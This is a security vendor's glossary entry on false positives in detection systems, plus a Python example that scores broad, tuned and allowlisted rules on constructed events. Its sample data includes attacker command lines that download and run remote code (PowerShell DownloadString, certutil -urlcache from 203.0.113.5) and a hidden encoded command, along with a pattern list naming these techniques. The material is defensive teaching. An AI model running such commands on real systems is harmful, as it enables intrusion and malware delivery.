Jericho Security | Glossary

Jericho's Cybersecurity Glossary | False Positive

Written by Jericho Security Team | September 27, 2024

Definition:

A false positive occurs when a security system incorrectly identifies benign activity as malicious, triggering an alert or blocking a legitimate action. Its counterpart is the false negative, malicious activity the system fails to flag; tuning that lowers one rate usually raises the other, so the two are evaluated together.

Use Cases:

  • Describes an intrusion detection system (IDS) flagging normal network traffic, such as a scheduled backup or a vulnerability scan run by the security team, as an attack.
  • Describes antivirus software quarantining a legitimate file as malware, for example an administrative script or a packed but benign installer.

Related Terms:

Questions and Answers:

  • What causes false positives in security systems?
    False positives can result from overly broad detection rules (a rule that matches on a common tool or port rather than on the attacker's specific behavior), poorly configured systems, stale signatures, or legitimate activity that genuinely resembles malicious behavior, such as administrators running remote-management scripts.

  • What are the consequences of false positives?
    False positives can lead to wasted analyst time investigating harmless incidents, decreased productivity when legitimate actions are blocked, and system disruptions. The larger risk is alert fatigue: when most alerts are noise, analysts begin to dismiss alerts by default and the true positives among them are missed.

  • How can false positives be reduced?
    False positives can be reduced by fine-tuning detection rules against a baseline of known-good activity, allowlisting approved behavior that otherwise looks suspicious (while reviewing the allowlist itself, since it is also a path an attacker could hide in), enriching alerts with better threat intelligence, improving system configuration, and tracking the false positive rate of each rule so that noisy rules are fixed or retired.
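The tuning advice above can be made concrete by scoring a detection rule against labeled events and measuring its false positive rate. The following is an added example, not from the Jericho glossary or any Jericho product; the events, user names, hosts, paths and rule logic are constructed for illustration. It compares an overly broad rule, a rule tuned to attacker behavior, and the tuned rule with an allowlist for a known service account.

```python
"""Score detection rules against labeled events and report their false positive rate.

Added example, not from the glossary page. All events below are constructed;
the 'malicious' field is the ground-truth label used only for scoring.
"""
from dataclasses import dataclass
from typing import Callable, Dict, List


@dataclass(frozen=True)
class Event:
    host: str
    user: str
    process: str
    cmdline: str
    malicious: bool  # ground truth, available only because the data is constructed


# Constructed sample telemetry: five benign process launches, three malicious ones.
EVENTS: List[Event] = [
    Event("ws01", "alice", "powershell.exe", "powershell.exe -File C:\\scripts\\backup.ps1", False),
    Event("ws02", "bob", "powershell.exe", "powershell.exe Get-ChildItem C:\\Users", False),
    Event("srv01", "svc_patch", "powershell.exe", "powershell.exe -ExecutionPolicy Bypass -File C:\\patch\\install.ps1", False),
    Event("ws03", "carol", "notepad.exe", "notepad.exe notes.txt", False),
    Event("srv02", "svc_deploy", "powershell.exe", "powershell.exe -w hidden -File C:\\deploy\\agent.ps1", False),
    Event("ws05", "eve", "powershell.exe", "powershell.exe -nop -w hidden -EncodedCommand SQBFAFgAIAAo", True),
    Event("ws06", "frank", "powershell.exe", "powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')", True),
    Event("ws07", "grace", "cmd.exe", "cmd.exe /c certutil -urlcache -f http://203.0.113.5/x.exe x.exe", True),
]


def broad_rule(e: Event) -> bool:
    """Overly broad: treats every PowerShell launch as malicious."""
    return e.process.lower() == "powershell.exe"


# Substrings that indicate attacker tradecraft rather than the tool itself.
SUSPICIOUS = ("-encodedcommand", "downloadstring", "-w hidden", "certutil -urlcache")


def tuned_rule(e: Event) -> bool:
    """Tuned: fires on behaviors attackers use, not on the tool name."""
    cl = e.cmdline.lower()
    return any(marker in cl for marker in SUSPICIOUS)


# Hypothetical allowlist: a deployment service account running scripts from its
# approved directory. Keyed on user AND path so a single attribute is not enough
# to slip past; this entry is still a bypass path if svc_deploy is compromised.
ALLOWLIST = {("svc_deploy", "c:\\deploy\\")}


def allowlisted(e: Event) -> bool:
    cl = e.cmdline.lower()
    return any(e.user == user and path in cl for user, path in ALLOWLIST)


def allowlisted_rule(e: Event) -> bool:
    """Tuned rule with known-good activity suppressed."""
    return tuned_rule(e) and not allowlisted(e)


def evaluate(rule: Callable[[Event], bool], events: List[Event]) -> Dict[str, float]:
    """Return the confusion matrix plus false positive rate and precision."""
    tp = fp = fn = tn = 0
    for e in events:
        hit = rule(e)
        if hit and e.malicious:
            tp += 1
        elif hit and not e.malicious:
            fp += 1
        elif not hit and e.malicious:
            fn += 1
        else:
            tn += 1
    fpr = fp / (fp + tn) if (fp + tn) else 0.0          # share of benign events flagged
    precision = tp / (tp + fp) if (tp + fp) else 0.0    # share of alerts that are real
    return {"tp": tp, "fp": fp, "fn": fn, "tn": tn,
            "fpr": round(fpr, 3), "precision": round(precision, 3)}


if __name__ == "__main__":
    for name, rule in (("broad", broad_rule), ("tuned", tuned_rule), ("tuned+allowlist", allowlisted_rule)):
        print(f"{name:16s} {evaluate(rule, EVENTS)}")
```

Running it shows the broad rule flagging four of five benign events (FPR 0.8, precision 0.33) while also missing the certutil download, the tuned rule cutting the FPR to 0.2 with no misses, and the allowlist removing the last false positive. The same scoring loop works on real telemetry once events are labeled from closed investigations; the false positive rate per rule is the number worth tracking over time.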